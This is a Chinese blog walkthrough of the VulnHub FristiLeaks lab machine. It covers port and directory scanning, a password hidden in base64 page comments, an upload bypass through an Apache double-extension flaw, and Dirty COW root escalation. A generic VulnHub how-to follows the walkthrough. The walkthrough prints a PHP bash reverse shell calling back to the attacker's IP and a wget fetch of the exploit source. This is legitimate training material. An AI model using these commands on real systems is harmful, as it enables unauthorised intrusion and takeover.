Vulnhub-FristiLeaks打靶

目录

一、nmap扫描/gobuster目录爆破

二、通过apache解析漏洞上传php反弹shell获得shell

三、脏牛提权


一、nmap扫描/gobuster目录爆破

nmap -sT --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描tcp开放了那些端口,保存到nmap/port中

nmap -sU --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描udp开放了那些端口,保存到nmap/udp中

nmap -sT -sC -Pn -v -sV -O 192.168.213.138 -oA nmapscan/detail

对开放的端口进行详细的探测,保存到detail中

nmap --script=vuln 192.168.213.138 nmapscan/vuln 

使用nmap的漏洞扫描脚本进行漏洞扫描

通过nmap扫描只知道开放了80端口,nmap枚举出的目录 /cola  /sisi   /beer 都是这个

进行目录爆破

使用gobuster进行常规的目录爆破,没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

使用gobuster对php,sql,txt,zip,rar文件进行爆破,也没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,zip,rar,tar

发现靶机名称为fristi leaks    leaks翻译是泄露的意思,把fristi当作目录名试试

看到这种登录框先考虑有没有sql万能密码,弱密码,尝试过后发现并没有

F12发现两段注释

第一段知道了一个用户名:eezeepz

第二段看到最后的两个“==”,应该是base64,进行解码

发现是png图片

看到了图片的内容,因为只有80端口开放,有一个登录界面,知道了一个用户名,猜测这个可能为密码

eezeepz:keKkeKKeKKeKkEkkEk

登陆成功

二、通过apache解析漏洞上传php反弹shell获得shell

是一个上传的功能点

先写一个php的反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'");?> 

进行上传,只允许这几种图片格式

使用wappalyzer发现apache版本低,可能存在解析漏洞

把shella.php改名为shella.php.jpg

成功上传,nc开启监听,访问:http://192.168.213.138/fristi/uploads/shella.php.jpg

反弹shell成功

三、脏牛提权

uname -a     发现靶机内核为2.6.32

gcc也是有的,可以用脏牛进行提权

把exp下载到靶机

python -m http.server 7777

wget http://192.168.213.128:7777/40839.c

gcc进行编译

gcc -pthread -o exp 40839.c -lcrypt

su firefart

总结:通过靶机名发现fristi目录,f12发现注释,进行base64解码后知道了密码,登录后使用apache解析漏洞成功获取到shell,最后使用脏牛进行提权。

### 关于 VulnHub安全测试与漏洞练习资源 VulnHub 是一个提供虚拟机镜像下载的平台,这些镜像是为了帮助网络安全爱好者学习渗透测试技术而设计的。通过模拟真实的网络环境和已知的安全漏洞,用户可以在合法授权的情况下进行实践操作。 #### 下载挑战解决方案 VulnHub 提供了一系列基于目标的操作系统或应用程序的虚拟机镜像文件。以下是关于如何获取并解决这些挑战的一些指导: 1. **访问官方网站**: 用户可以前往 VulnHub 官方网站 (https://www.vulnhub.com/) 浏览可用的虚拟机镜像列表[^1]。 2. **选择合适的机器**: 每台机器都有其特定的目标和技术难度等级描述。初学者可以选择标注为入门级的机器来熟悉基本流程[^2]。 3. **下载所需工具**: 大多数情况下, 需要使用 VirtualBox 或 VMware 这样的虚拟化软件运行所下载的 `.ova` 文件[^3]。 4. **配置网络设置**: 正确设置主机与客户操作系统之间的网络连接方式非常重要。通常推荐桥接模式以便让虚拟机能被同一局域网内的其他设备发现[^4]。 5. **执行扫描与分析**: 使用 Nmap 等端口扫描工具识别开放服务及其版本号;接着利用 Metasploit Framework 或 Exploit Database 寻找可能存在的漏洞加以验证[^5]: ```bash nmap -A <target_ip> ``` 6. **尝试提权与控制**: 成功找到入口点之后,还需要进一步探索是否存在本地权限提升的机会,最终实现完全控制系统的目的[^6]。 7. **撰写报告总结经验教训**: 将整个过程记录下来形成文档不仅有助于自我反思也方便分享给他人参考学习[^7]。 请注意,在任何实际环境中实施上述活动之前都应获得适当许可以免触犯法律!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值